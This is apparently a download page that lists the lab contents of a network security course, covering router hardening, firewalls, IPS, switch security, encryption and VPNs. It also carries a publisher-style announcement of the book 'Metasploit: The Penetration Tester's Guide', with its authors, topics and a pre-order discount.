Chapter 1: Lab A: Researching Network Attacks and Security Audit Tools

  • Part 1. Researching Network Attacks
  • Part 2. Researching Security Audit Tools

Chapter 2: Lab A: Securing the Router for Administrative Access

  • Part 1. Basic Router Configuration
  • Part 2. Control Administrative Access for Routers
  • Part 3. Configure Administrative Roles
  • Part 4. Configure IOS Resilience and Management Reporting
  • Part 5. Configure Automated Security Features

Chapter 3: Lab A” Securing Administrative Access Using AAA and RADIUS 

  • Part 1. Basic Network Device Configuration
  • Part 2. Configure Local Authentication
  • Part 3. Configure Local Authentication Using AAA on R3
  • Part 4. Configure Centralized Authentication Using AAA and RADIUS

Chapter 4: Lab A: Configuring CBAC and Zone-Based Firewalls

  • Part 1. Basic Router Configuration
  • Part 2. Configuring a Context-Based Access Control (CBAC) Firewall
  • Part 3. Configuring a Zone-Based Firewall (ZBF) Using SDM.92

Chapter 5: Lab A: Configuring an Intrusion Prevention System (IPS) Using the CLI and SDM

  • Part 1. Basic Router Configuration
  • Part 2. Configuring IPS Using the Cisco IOS CLI
  • Part 3. Configuring IPS using SDM

Chapter 6: Lab A: Securing Layer 2 Switches

  • Part 1. Basic Device Configuration
  • Part 2. SSH Configuration
  • Part 3. Secure Trunks and Access Ports
  • Part 4. Configure SPAN and Monitor Traffic

Chapter 7: Lab A: Exploring Encryption Methods

  • Part 1. (Optional) Build the Network and Configure the PCs
  • Part 2. Decipher a Pre-encrypted Message Using the Vigenere Cipher
  • Part 3. Create a Vigenere Cipher Encrypted Message and Decrypt It
  • Part 4. Use Steganography to Embed a Secret Message in a Graphic

Chapter 8: Lab A: Configuring a Site-to-Site VPN Using Cisco IOS and SDM

  • Part 1. Basic Router Configuration
  • Part 2. Configure a Site-to-Site VPN with Cisco IOS
  • Part 3. Configure a Site-to-Site IPsec VPN with SDM

Chapter 8: Lab B: Configuring a Remote Access VPN Server and Client

  • Part 1. Basic Router Configuration
  • Part 2. Configuring a Remote Access VPN

Chapter 8: Lab C (Optional): Configuring a Remote Access VPN Server and Client 

  • Part 1. Basic Router Configuration
  • Part 2. Configuring a Remote Access VPN

Chapter 9: Lab A: Security Policy Development and Implementation

  • Part 1. Create a Security Policy
  • Part 2. Basic Network Device Configuration (Chapters 2 and 6)
  • Part 3. Secure Network Routers
  • Part 4. Secure Network Switches (Chapter 6)
  • Part 5. Configuring VPN Remote Access.

Download:


METASPLOIT The Penetration Tester’s Guide

METASPLOIT The Penetration Tester’s Guide

We are proud to announce the availability of a new book – Metasploit, a Penetration Testers Guide. The book is authored by Dave Kennedy (ReL1K), Devon Kearns (dookie), Jim O’Gorman (_Elwood_), and Mati Aharoni (muts). The book is released through NoStarch Press.

Our goals with the book are to provide a single resource for the Metasploit Framework which doesn’t quickly become outdated and to provide an in depth resource for penetration testers who wish to understand the Framework inside out. The book covers everything from Metasploit basics to fuzzing, exploit development, custom module creation, writing post exploitation modules and meterpreter kung-fu.

In addition to the Metasploit Framework, we cover toolkits that leverage the Framework such as the Social-Engineer Toolkit (SET) and Fast-Track. The book also integrates the Penetration Testing Execution Standard (PTES) as the general methodology for performing penetration testing.

As part of this release announcement, the book is available for pre orders with a 40% discount at No Starch Press when you use the discount code of REDTEAM. This special discount code is valid until midnight on Wednesday, July 20th and if you pre-order the print book, you will immediately receive a PDF version of the book so get your copy now! Over 25% of net revenue going to the authors will be donated to the HFC group.

In addition, the authors will be appearing on the PaulDotCom Podcast this Thursday and the Infosec Daily Podcast Friday to discuss the book and give away free tickets to DerbyCon.

Download: